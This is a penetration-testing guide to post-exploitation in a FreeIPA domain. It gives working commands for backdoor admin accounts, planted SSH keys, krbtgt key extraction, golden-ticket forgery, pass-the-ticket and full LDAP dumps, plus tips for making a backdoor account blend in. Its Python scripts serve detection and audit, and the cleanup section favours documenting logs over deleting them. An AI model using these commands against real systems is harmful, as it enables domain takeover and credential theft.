Post-Exploitation Techniques

Methods to maintain access, escalate privileges, and move laterally within a compromised FreeIPA environment.


Persistence

After gaining initial access to a FreeIPA environment, establishing persistence mechanisms ensures continued access even if the initial entry point is discovered and closed.

User Creation

Creating backdoor user accounts is a common persistence technique. In FreeIPA, this can be done using the IPA CLI or LDAP modifications.

Create a new user account using IPA CLI
ipa user-add backdoor --first=Back --last=Door --password
Add the backdoor user to the admins group
ipa group-add-member admins --users=backdoor

Security Consideration:

Both steps leave a clear record: the Directory Server access log shows the ADD of the new entry and the MOD of cn=admins together with the DN that performed them, and the IPA API log (/var/log/httpd/error_log) records user_add and group_add_member with the calling principal. Where possible use a less privileged account that carries only the specific privileges you need, or pick a name that matches the existing naming convention so the entry does not stand out in a user listing.

SSH Key Backdoor

Adding SSH public keys to existing user accounts provides a stealthy way to maintain access without changing passwords. Enrolled clients fetch the keys through SSSD (sss_ssh_authorizedkeys), so a key added in the directory works on every enrolled host the user is allowed to log in to, subject to the client's SSSD cache refresh.

Add an SSH public key to a user account (--sshpubkey replaces whatever keys are already on the entry; include the existing ones if they must keep working)
ipa user-mod victim --sshpubkey="ssh-rsa AAAA... backdoor@attacker"
Add an SSH key using LDAP (an LDIF "add" appends to the existing values instead of replacing them; -W prompts for the bind password instead of taking it on the command line)
ldapmodify -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -f add_ssh_key.ldif

Example LDIF file for adding SSH keys:

dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com
changetype: modify
add: ipaSshPubKey
ipaSshPubKey: ssh-rsa AAAA... backdoor@attacker

Kerberos Golden Ticket

A Kerberos golden ticket is a Ticket Granting Ticket (TGT) forged with the krbtgt principal's key. Whoever holds that key can mint tickets for any principal in the realm until the key is rotated, which makes it the most durable form of persistence available.

Read the stored key of the krbtgt principal (the attribute is denied to ordinary accounts, admin included: bind as Directory Manager or use ldapi as root on an IPA server; the value is encrypted with the realm master key, krbMKey, which lives in the same container, and must be decrypted before it can be used)
ldapsearch -x -h <target_ip> -D "cn=Directory Manager" -w password -b "cn=EXAMPLE.COM,cn=kerberos,dc=example,dc=com" "(krbPrincipalName=krbtgt/EXAMPLE.COM@EXAMPLE.COM)" krbPrincipalKey
Create a golden ticket using Impacket (FreeIPA issues AES keys for krbtgt by default, so pass the AES key with -aesKey; -nthash only works if the principal also has an RC4 key; ticketer.py requires a domain SID, which FreeIPA only has once ipa-adtrust-install has been run, stored as ipaNTSecurityIdentifier on the domain entry)
python ticketer.py -aesKey <krbtgt_aes256_key> -domain-sid <domain_sid> -domain example.com admin
Use the forged golden ticket (ticketer.py writes <principal>.ccache)
export KRB5CCNAME=./admin.ccache

Diagram: Kerberos golden ticket process (obtaining the krbtgt key, forging the TGT, and using it against services).

Lateral Movement

Lateral movement involves using compromised credentials or systems to access other systems within the FreeIPA environment.

Pass-the-Ticket

The pass-the-ticket technique involves using captured Kerberos tickets to authenticate to other services without knowing the account password.

Import a captured ticket into the current session
export KRB5CCNAME=/path/to/ticket.ccache
Verify the imported ticket
klist
Use the ticket to access a service
ssh -o GSSAPIAuthentication=yes user@server.example.com

SSH Access via Host Keytabs

Host keytabs let you authenticate as the host principal (host/<fqdn>@REALM). A host principal is not a user account: sshd only accepts it for a target account whose ~/.k5login lists that principal, so its main value is acting as the host toward IPA, for example reading what the host is allowed to see or retrieving keytabs for services the host manages with ipa-getkeytab.

List principals in the host keytab (requires root access)
klist -k /etc/krb5.keytab
Authenticate using the host keytab
kinit -k -t /etc/krb5.keytab host/<fqdn>
Use the host credentials to access other systems (works only where the target account authorizes the host principal, e.g. via ~/.k5login)
ssh -o GSSAPIAuthentication=yes user@server.example.com

Lateral Movement Tip:

When moving laterally, look for hosts with trust relationships or shared service accounts. These can provide paths to access additional systems within the environment.

Data Exfiltration

Extracting valuable data from the FreeIPA environment can provide insights into the organization's structure, user accounts, and security posture.

LDAP Dumping

Extracting information from the LDAP directory can provide valuable data about users, groups, hosts, and access controls. Note that a default FreeIPA install permits anonymous binds, so a large part of the tree (users, groups, hosts, HBAC and sudo rules) is often readable without any credentials at all; the admin bind below is only needed for the remaining attributes.

Dump the entire LDAP directory to a file (ldif-wrap=no keeps long values such as SSH keys on one line)
ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "dc=example,dc=com" -s sub -o ldif-wrap=no "(objectClass=*)" > ldap_dump.ldif
Extract active user accounts to a file
ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=users,cn=accounts,dc=example,dc=com" "(&(objectClass=posixAccount)(!(nsAccountLock=TRUE)))" uid uidNumber > users.txt

Data Sensitivity Note:

LDAP dumps can contain sensitive information including user details, group memberships, and access control rules. Handle this data with care and in accordance with the rules of engagement for your penetration test.

Certificate Extraction

Extracting certificates and certificate authority information can provide insights into the organization's PKI and potentially be used for further attacks.

List all certificates in the FreeIPA CA
ipa cert-find --all
Export a specific certificate
ipa cert-show <serial_number> --out=cert.pem
Extract the CA certificate
curl -k https://<target_ip>/ipa/config/ca.crt > ca.crt

Password Policy Information

Extracting password policy information can reveal weaknesses in the organization's security posture.

Show the global password policy (ipa pwpolicy-find lists the group-specific policies as well)
ipa pwpolicy-show
Extract password policy information using LDAP (policies live under the realm container cn=REALM,cn=kerberos, not under cn=accounts; the global one is cn=global_policy, group policies are named after the group)
ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=EXAMPLE.COM,cn=kerberos,dc=example,dc=com" -s sub "(objectClass=krbPwdPolicy)"
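The dump and the policy entries above are easier to assess offline. The following script is an added example (not code from the original page or from FreeIPA): it parses LDIF the way ldapsearch emits it, including folded continuation lines and base64 "::" values, then reports persistence indicators on user entries (SSH keys, admins membership, lock state) and weak settings in krbPwdPolicy entries. SAMPLE_LDIF is a constructed stand-in for ldap_dump.ldif; the suffix dc=example,dc=com and the realm EXAMPLE.COM are assumptions.

```python
"""Offline review of an LDAP dump from a FreeIPA directory (added example).

Parses LDIF (folded lines, '::' base64 values), then flags persistence
indicators on users and weak krbPwdPolicy settings. Suffix dc=example,dc=com
is an assumption; SAMPLE_LDIF is constructed, not taken from a real server.
"""
import base64
from collections import defaultdict

# Constructed sample. The jdoe key is folded across two lines as ldapsearch
# does for long values; the svc-old key is base64-encoded at import time so
# the '::' form round-trips exactly.
SAMPLE_LDIF = """\
dn: uid=admin,cn=users,cn=accounts,dc=example,dc=com
objectClass: posixAccount
uid: admin
memberOf: cn=admins,cn=groups,cn=accounts,dc=example,dc=com

dn: uid=jdoe,cn=users,cn=accounts,dc=example,dc=com
objectClass: posixAccount
uid: jdoe
ipaSshPubKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGhvc3RrZXk
  backdoor@attacker
memberOf: cn=admins,cn=groups,cn=accounts,dc=example,dc=com

dn: uid=svc-old,cn=users,cn=accounts,dc=example,dc=com
objectClass: posixAccount
uid: svc-old
nsAccountLock: TRUE
ipaSshPubKey:: """ + base64.b64encode(b"ssh-rsa AAAA legit@example.com").decode() + """

dn: cn=global_policy,cn=EXAMPLE.COM,cn=kerberos,dc=example,dc=com
objectClass: krbPwdPolicy
cn: global_policy
krbMaxPwdLife: 7776000
krbPwdMinLength: 6
krbPwdMaxFailure: 0
krbPwdHistoryLength: 0
krbPwdLockoutDuration: 600

# search result
search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return a list of (dn, {attribute_lowercase: [values]}) entries."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:      # RFC 2849 continuation line
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    entries, current = [], None
    for line in unfolded:
        if not line or line.startswith("#"):      # blank line or comment ends an entry
            if current:
                entries.append(current)
            current = None
            continue
        name, _, rest = line.partition(":")
        if rest.startswith(":"):                  # 'attr:: value' is base64-encoded
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        if name == "dn":
            current = (value, defaultdict(list))
        elif current is not None:                 # drops trailers such as 'search: 2'
            current[1][name.lower()].append(value)
    if current:
        entries.append(current)
    return entries


def has_class(attrs, objectclass):
    return objectclass in (v.lower() for v in attrs.get("objectclass", []))


def persistence_indicators(entries, base_dn="dc=example,dc=com"):
    """(uid, indicator, key comment, locked) for SSH keys and admins membership."""
    admins = f"cn=admins,cn=groups,cn=accounts,{base_dn}".lower()
    found = []
    for dn, attrs in entries:
        if not has_class(attrs, "posixaccount"):
            continue
        uid = attrs.get("uid", [dn])[0]
        locked = attrs.get("nsaccountlock", ["FALSE"])[0].upper() == "TRUE"
        for key in attrs.get("ipasshpubkey", []):
            parts = key.split()
            comment = parts[2] if len(parts) > 2 else ""   # comment often names the owner
            found.append((uid, "ssh-key", comment, locked))
        if admins in (m.lower() for m in attrs.get("memberof", [])):
            found.append((uid, "admins-member", "", locked))
    return found


# (attribute, predicate on its integer value, finding) for krbPwdPolicy entries
POLICY_CHECKS = [
    ("krbpwdminlength", lambda v: v < 8, "minimum length below 8"),
    ("krbpwdmaxfailure", lambda v: v == 0, "lockout disabled (krbPwdMaxFailure=0)"),
    ("krbpwdhistorylength", lambda v: v == 0, "no password history"),
    ("krbmaxpwdlife", lambda v: v == 0, "passwords never expire"),
]


def weak_policy_settings(entries):
    """(policy name, finding) for every krbPwdPolicy attribute that fails a check."""
    weak = []
    for dn, attrs in entries:
        if not has_class(attrs, "krbpwdpolicy"):
            continue
        name = attrs.get("cn", [dn])[0]
        for attr, is_weak, finding in POLICY_CHECKS:
            if attr in attrs and is_weak(int(attrs[attr][0])):
                weak.append((name, finding))
    return weak


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    for item in persistence_indicators(parsed):
        print("persistence:", item)
    for item in weak_policy_settings(parsed):
        print("policy:", item)
```

Point parse_ldif at the contents of ldap_dump.ldif instead of SAMPLE_LDIF to run it against a real dump. The base64 branch matters in practice: ldapsearch emits "::" for any value that is not plain printable ASCII, which includes some ipaSshPubKey values and most attributes carrying binary data, and a grep for "ipaSshPubKey:" misses those.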

Covering Tracks

After completing the penetration test, it's important to clean up any artifacts and ensure that the environment is returned to its original state.

Log Cleanup

FreeIPA records activity in several places: the Directory Server access log (every bind and LDAP operation with the bound DN), the KDC log (every AS and TGS request, including those made with passed or forged tickets), and the IPA API log in the Apache error log (every ipa command with the calling principal and result). Removing these logs is normally outside the rules of engagement, and on a well-run deployment they are forwarded to a central collector anyway, so the realistic expectation is to know what you left behind and document it rather than delete it. The journal entries for the services only show start/stop events, not the operations themselves.

View Directory Server access log (the instance name is the realm with dots replaced by dashes)
tail -n 200 /var/log/dirsrv/slapd-EXAMPLE-COM/access
View KDC log
tail -n 200 /var/log/krb5kdc.log
View IPA API log entries for the persistence commands used above
grep -E 'user_add|user_mod|group_add_member' /var/log/httpd/error_log
View Directory Server service events in the journal
journalctl -u dirsrv@EXAMPLE-COM.service
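The access log is the record that ties the actions in this guide back to an identity, but it splits the bind from the operations that follow it: the BIND and its RESULT appear once per connection, and every later MOD, ADD or SRCH on that connection carries only conn= and op=. The following script is an added example (not code from the original page, 389-ds or FreeIPA) that joins the two on conn=, confirms each operation from its RESULT line, and flags writes under the users container, changes to the admins group, and subtree searches that return enough entries to be a dump. SAMPLE_ACCESS_LOG is a constructed excerpt in the default access-log format; the suffix dc=example,dc=com is assumed.

```python
"""Attribute 389-ds access-log operations to the identity that performed them
(added example; constructed sample, assumed suffix dc=example,dc=com)."""
import re

# Constructed excerpt. conn=41 is a simple bind as admin that adds a user,
# changes a user and edits cn=admins; conn=42 is a GSSAPI bind (two BIND
# round trips, the first answered with err=14 "SASL bind in progress") that
# then dumps the whole suffix.
SAMPLE_ACCESS_LOG = """\
[12/Mar/2024:10:15:02.113421 +0000] conn=41 fd=64 slot=64 connection from 10.0.0.5 to 10.0.0.10
[12/Mar/2024:10:15:02.114009 +0000] conn=41 op=0 BIND dn="uid=admin,cn=users,cn=accounts,dc=example,dc=com" method=128 version=3
[12/Mar/2024:10:15:02.120355 +0000] conn=41 op=0 RESULT err=0 tag=97 nentries=0 wtime=0.000101 optime=0.006346 etime=0.006400 dn="uid=admin,cn=users,cn=accounts,dc=example,dc=com"
[12/Mar/2024:10:15:02.131220 +0000] conn=41 op=1 MOD dn="uid=jdoe,cn=users,cn=accounts,dc=example,dc=com"
[12/Mar/2024:10:15:02.140118 +0000] conn=41 op=1 RESULT err=0 tag=103 nentries=0 wtime=0.000087 optime=0.008898 etime=0.008940
[12/Mar/2024:10:15:03.002811 +0000] conn=41 op=2 ADD dn="uid=backdoor,cn=users,cn=accounts,dc=example,dc=com"
[12/Mar/2024:10:15:03.051009 +0000] conn=41 op=2 RESULT err=0 tag=105 nentries=0 wtime=0.000092 optime=0.048198 etime=0.048240
[12/Mar/2024:10:15:03.060000 +0000] conn=41 op=3 MOD dn="cn=admins,cn=groups,cn=accounts,dc=example,dc=com"
[12/Mar/2024:10:15:03.070000 +0000] conn=41 op=3 RESULT err=0 tag=103 nentries=0 wtime=0.000090 optime=0.009910 etime=0.010000
[12/Mar/2024:10:15:03.080000 +0000] conn=41 op=4 UNBIND
[12/Mar/2024:10:15:03.080100 +0000] conn=41 op=4 fd=64 closed - U1
[12/Mar/2024:10:16:00.001000 +0000] conn=42 op=0 BIND dn="" method=sasl version=3 mech=GSSAPI
[12/Mar/2024:10:16:00.003000 +0000] conn=42 op=0 RESULT err=14 tag=97 nentries=0 wtime=0.000050 optime=0.002000 etime=0.002050, SASL bind in progress
[12/Mar/2024:10:16:00.004000 +0000] conn=42 op=1 BIND dn="" method=sasl version=3 mech=GSSAPI
[12/Mar/2024:10:16:00.006000 +0000] conn=42 op=1 RESULT err=0 tag=97 nentries=0 wtime=0.000050 optime=0.002000 etime=0.002050 dn="uid=jdoe,cn=users,cn=accounts,dc=example,dc=com"
[12/Mar/2024:10:16:00.010000 +0000] conn=42 op=2 SRCH base="dc=example,dc=com" scope=2 filter="(objectClass=*)" attrs=ALL
[12/Mar/2024:10:16:01.500000 +0000] conn=42 op=2 RESULT err=0 tag=101 nentries=5120 wtime=0.000100 optime=1.490000 etime=1.490100
[12/Mar/2024:10:16:02.000000 +0000] conn=42 op=3 SRCH base="cn=users,cn=accounts,dc=example,dc=com" scope=2 filter="(uid=jdoe)" attrs="uid memberOf"
[12/Mar/2024:10:16:02.001000 +0000] conn=42 op=3 RESULT err=0 tag=101 nentries=1 wtime=0.000100 optime=0.000900 etime=0.001000
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] conn=(?P<conn>\d+) (?:op=(?P<op>\d+) )?(?P<rest>.*)$")
DN_RE = re.compile(r'dn="([^"]*)"')
WRITE_OPS = ("ADD", "MOD", "DEL", "MODRDN")


def parse_access_log(lines, dump_threshold=1000):
    """Return (ts, conn, actor_dn, kind, target, succeeded) for every write
    operation and for every search returning at least dump_threshold entries."""
    bound, pending, events = {}, {}, []      # conn -> actor; (conn, op) -> request
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, conn, op, rest = m.group("ts", "conn", "op", "rest")
        key, verb = (conn, op), rest.split(" ", 1)[0]
        if verb == "BIND" or verb in WRITE_OPS:
            dn = DN_RE.search(rest)
            pending[key] = (verb, dn.group(1) if dn else "")
        elif verb == "SRCH":
            base = re.search(r'base="([^"]*)"', rest)
            scope = re.search(r"scope=(\d)", rest)
            pending[key] = ("SRCH", f"{base.group(1) if base else '?'} scope={scope.group(1) if scope else '?'}")
        elif verb == "RESULT" and key in pending:
            kind, target = pending.pop(key)
            err = re.search(r"err=(\d+)", rest)
            ok = err is not None and err.group(1) == "0"
            if kind == "BIND":
                if ok:                          # err=14 means the SASL exchange is still in progress
                    authz = DN_RE.search(rest)  # RESULT carries the effective identity for SASL binds
                    bound[conn] = (authz.group(1) if authz else target) or "anonymous"
                continue
            if kind == "SRCH":
                n = re.search(r"nentries=(\d+)", rest)
                if n is None or int(n.group(1)) < dump_threshold:
                    continue
                kind, target = "DUMP", f"{target} nentries={n.group(1)}"
            events.append((ts, conn, bound.get(conn, "anonymous"), kind, target, ok))
    return events


def flag_suspicious(events, base_dn="dc=example,dc=com"):
    """(actor, kind, target) for writes under cn=users, edits of cn=admins and bulk dumps."""
    users = f"cn=users,cn=accounts,{base_dn}".lower()
    admins = f"cn=admins,cn=groups,cn=accounts,{base_dn}".lower()
    flagged = []
    for _ts, _conn, actor, kind, target, _ok in events:
        t = target.lower()
        if kind == "DUMP" or (kind in WRITE_OPS and (t.endswith(users) or t == admins)):
            flagged.append((actor, kind, target))
    return flagged


if __name__ == "__main__":
    for actor, kind, target in flag_suspicious(parse_access_log(SAMPLE_ACCESS_LOG.splitlines())):
        print(f"{kind:6} by {actor}: {target}")
```

Feed it the access file from /var/log/dirsrv/slapd-EXAMPLE-COM/ line by line for a real review. The access log names the entry that changed but not the attribute, so a MOD of uid=jdoe could be a new SSH key or a harmless change of phone number; the audit log (off by default, enabled with nsslapd-auditlog-logging-enabled) records the actual modification, and the IPA API log in /var/log/httpd/error_log shows the command and arguments when the change went through the ipa tooling.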

Removing Backdoors

Any persistence mechanisms or backdoors created during the penetration test should be removed to return the environment to its original state.

Remove a backdoor user (a plain user-del removes the entry outright; --preserve would keep a trace, which is not what you want here)
ipa user-del backdoor
Remove SSH keys from a user (an empty --sshpubkey clears every key on the entry, including legitimate ones; to remove only the key you added, set --sshpubkey to the original keys again, or use ldapmodify with "delete: ipaSshPubKey" followed by the exact value you added)
ipa user-mod victim --sshpubkey=
Remove a user from a group
ipa group-remove-member admins --users=backdoor

Cleanup Checklist

Use this checklist to ensure that all artifacts from the penetration test are properly cleaned up.

Penetration Test Cleanup Checklist:

  • Remove any created user accounts
  • Remove any added SSH keys
  • Remove any modified group memberships
  • Delete any extracted data files
  • Revoke any certificates issued during the test (ipa cert-revoke) and remove the associated service or host entries you created
  • Clear Kerberos tickets (kdestroy)
  • Document all cleanup actions in the penetration test report
Diagram: post-exploitation cleanup process (removing persistence, deleting extracted data, clearing tickets, documenting the actions taken).